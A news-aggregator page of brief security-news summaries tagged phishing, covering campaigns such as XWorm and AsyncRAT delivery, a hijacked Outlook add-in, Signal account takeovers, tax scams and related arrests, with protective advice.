All news with #phishing tag

🔒 Fortinet researchers disclosed a phishing campaign that chains a legacy Microsoft Office vulnerability (CVE-2018-0802) with fileless execution to deliver the commercially available XWorm RAT. The attack begins with business-themed lures and a malicious Excel add-in, then pivots into HTA and PowerShell stages to keep most activity off disk. A memory-resident .NET stage is hollowed into msbuild.exe, and XWorm communicates with AES-encrypted C2 while supporting modular plugins that enable credential theft, data exfiltration, and other operator actions.

🔒 The AgreeTo Outlook add-in was hijacked and turned into a full phishing kit that stole more than 4,000 Microsoft account credentials, researchers at Koi Security report. The module, listed on the Microsoft Office Add-in Store since December 2022, relied on an abandoned Vercel-hosted URL that an attacker claimed and used to serve a fake Microsoft sign-in page inside Outlook’s sidebar. Credentials, credit card details and banking security answers were exfiltrated via a Telegram bot API before victims were redirected to the real login page. Microsoft removed the add-in after the disclosure; users should uninstall AgreeTo and reset affected passwords.

🔒 Kaspersky's anti-phishing systems blocked more than 554 million phishing-link attempts in 2025, while Mail Anti-Virus intercepted nearly 145 million malicious attachments and almost 45% of all email traffic was identified as spam. Scammers refined tactics across ticketing and streaming fraud, messaging-app account takeovers, government impersonation, and KYC harvesting, often using AI-generated content and deepfakes. Messaging platforms such as Telegram and WhatsApp were heavily abused to hijack accounts via phishing and malicious Mini Apps. Users are advised to check URLs carefully, never share verification codes, enable two-factor authentication, and run robust protection like Kaspersky solutions.

🔒 The Netherlands Police arrested a 21-year-old man from Dordrecht accused of selling access to the JokerOTP phishing-as-a-service platform that captures one-time passwords to enable account takeover. Investigators say this is the third arrest after a three-year probe that dismantled the operation in April 2025 and previously identified a developer and a co-developer. The seller advertised license keys on Telegram, allowing subscribers to automate calls that tricked victims into revealing OTPs, PINs, and card data, leading to fraud and unauthorized transfers.

🔍 Cybersecurity researchers at Koi Security disclosed the first known malicious Microsoft Outlook add-in, codenamed AgreeToSteal. The attacker claimed an abandoned add-in's domain and used the manifest URL (outlook-one.vercel[.]app) to serve a fake Microsoft sign-in page, harvesting more than 4,000 credentials and exfiltrating them via the Telegram Bot API. The affected add-in, AgreeTo, a calendar/availability tool last updated in December 2022, had requested ReadWriteItem permissions that could have allowed covert mailbox access. Koi recommends domain verification, re-review triggers, delisting stale add-ins, and visible install counts to reduce similar supply-chain abuse.

💌 Check Point researchers report a sharp rise in Valentine-themed phishing websites, fraudulent online stores, and fake dating platforms that aim to steal personal data and payment information from shoppers and daters ahead of Valentine’s Day 2026. From March–December 2025, new Valentine-related domains averaged 474 per month; registrations jumped to 696 in January 2026, a 44% increase. In the first five days of February researchers detected 152 additional domains, a further 36% rise in the daily average. The trend reflects opportunistic abuse of seasonal demand and last-minute gift shopping.

📄 Malwarebytes warned of a phishing campaign that disguises malware as ordinary PDF files to increase the likelihood that employees will open them. Attackers host a virtual hard disk on IPFS that mounts locally and contains a Windows Script File (WSF) masquerading as a PDF; opening it executes AsyncRAT and grants remote access. Organizations should configure Windows to show file extensions and treat gateway-hosted files with caution.

📎 Forcepoint observed a high-volume phishing campaign using the subject "Your Document" that delivers weaponised Windows shortcut (.lnk) attachments to initiate a multi-stage Phorpiex infection. The .lnk files exploit hidden extensions and copied Windows icons to turn a single click into silent execution: the shortcut launches cmd.exe, which invokes PowerShell to download and run a second-stage binary saved as windrv.exe. The retrieved payload is linked to the long-running Phorpiex MaaS botnet and, in these incidents, deployed Global Group ransomware that encrypts files and alters the desktop without contacting a C2 server.

🔍 FortiGuard Labs observed a phishing campaign delivering a new XWorm RAT variant via malicious Excel attachments that exploit CVE-2018-0802 to execute embedded shellcode. The chain uses an obfuscated HTA and PowerShell to load a fileless .NET module, which downloads a PE in memory and uses process hollowing into Msbuild.exe to run XWorm. The RAT establishes AES-encrypted C2, supports extensive commands and plugins, and enables data theft, remote control, DDoS, and ransomware operations. Fortinet protections including FortiMail, AV, IPS, and Web Filtering are effective against observed indicators.

📱 ZeroDayRAT is a newly documented cross-platform mobile spyware operation targeting Android and iOS, according to iVerify. The toolkit grants persistent access to messages, precise GPS history, notifications, camera, microphone and keystroke capture, and exposes a dedicated web dashboard for rapid device profiling. Infections are commonly initiated via smishing, counterfeit app stores, phishing emails and links shared through messaging apps.

📄 Forcepoint X‑Labs researchers have uncovered a Phorpiex‑backed phishing campaign that weaponizes Windows shortcut (.lnk) files to deploy Global Group ransomware. Attackers send messages with the subject "Your Document" and attachments like "Document.doc.lnk", exploiting hidden file extensions and a Word‑style icon to trick recipients. The .lnk uses built‑in utilities (cms.exe and PowerShell) and heavily obfuscated commands to fetch and run a second‑stage payload, leveraging Living‑off‑the‑Land techniques so the ransomware executes locally without external C2 communication.

🔍Tax season 2026 brings a renewed surge in IRS-related scams as fraudsters exploit email, text and phone channels to steal refunds and personal data. Scammers impersonate the IRS, tax preparers or software vendors with spoofed logos, domains and caller IDs, and may demand unusual payments or coax victims into filing fraudulent returns. Watch for phishing/smishing/vishing, W-2 fraud, fake tax credits and dishonest preparers. Protect accounts with MFA, consider an IP PIN, file early and report suspicious messages to phishing@irs.gov.

🔒 Mandiant links a targeted intrusion to UNC1069 that leveraged AI-enabled social engineering to compromise a cryptocurrency executive and deploy multiple macOS malware families. The attacker used a hijacked Telegram account, a spoofed Zoom meeting allegedly featuring a deepfake video, and a ClickFix paste-and-execute ruse to trick the victim into running troubleshooting commands. The operation dropped WAVESHAPER, HYPERCALL, HIDDENCALL, SUGARLOADER, DEEPBREATH, CHROMEPUSH, and SILENCELIFT to harvest credentials, browser data, and session tokens. GTIG and Mandiant highlight UNC1069's expanding use of GenAI for lures and tooling.

📧 Microsoft is investigating an ongoing Exchange Online issue that is mistakenly marking legitimate email messages as phishing and quarantining them. The problem began on February 5 and continues to disrupt customers' ability to send and receive mail. Microsoft traced the fault to a newly introduced URL rule that incorrectly classifies certain links as malicious. The company is releasing quarantined messages and working to unblock legitimate URLs while it completes remediation.

🔐 German security agencies warn of an active campaign targeting high‑ranking politicians, soldiers, diplomats and journalists by seizing their Signal accounts. Attackers impersonate support teams to request secret PINs or trick users into approving device pairing via QR codes, then move the account to a number they control. No malware or software vulnerabilities are involved; the campaign relies on social engineering. Authorities note similar methods could be used against WhatsApp, and stress that official support will never request PINs via message.

🔎 A detailed investigation by OCCRP traced a romance scammer who impersonated the Crown Prince of Dubai and defrauded a Romanian businesswoman of more than US $2.5 million. Over two years the con combined thousands of messages, staged in-person meetings, and an elaborate fake banking site showing a phantom £200 million balance. Photographs and bank-trace evidence led reporters and UK police to identify intermediaries and to locate the suspect at a mansion in Abuja, Nigeria. The case underscores the sophistication and international reach of modern romance and investment scams.

🔒 Germany's Federal Office for the Protection of the Constitution (BfV) and the Federal Office for Information Security (BSI) have issued a joint advisory about a likely state‑sponsored phishing campaign that abuses Signal's legitimate features to seize accounts. Threat actors impersonate "Signal Support" or a "Signal Security ChatBot" to solicit SMS PINs or trick victims into scanning QR codes, enabling account registration on attacker‑controlled devices or silent device linking. Authorities recommend enabling Registration Lock, avoiding sharing verification codes, and routinely reviewing linked devices; the same methods can be applied to WhatsApp.

⚠️ Germany's domestic intelligence agencies warn of suspected state-backed campaigns that hijack messaging accounts on Signal to target politicians, military officers, diplomats, and journalists. The attacks use social engineering rather than malware, abusing legitimate features such as QR-code pairing and SMS/PIN verification. Two variants are reported: a full account takeover and a silent device pairing that monitors chats and contacts. Authorities advise blocking/reporting support-like messages, enabling Registration Lock, and routinely checking linked devices.

🛡️ A recent phishing campaign delivers malicious virtual hard disks that masquerade as PDF invoices and purchase orders, enabling attackers to install AsyncRAT. The files are hosted on IPFS and mount as local drives on Windows, which can bypass some built-in protections; inside each disk is a Windows Script File disguised as the expected PDF. Malwarebytes Labs, citing Securonix, identified the Dead#Vax campaign and recommends showing file extensions and exercising caution with disk images.

🔒 Kyle Svara, 26, pleaded guilty in federal court to phishing access codes and hacking nearly 600 Snapchat accounts to steal nude photos that he kept, sold, or traded. Between May 2020 and February 2021 he used social engineering to harvest credentials from roughly 570 victims and accessed at least 59 accounts to download private images. Svara advertised hacking services online, communicated via Kik, and accepted paid jobs including work for former Northeastern coach Steve Waithe. He now faces multiple federal charges, and is scheduled for sentencing on May 18.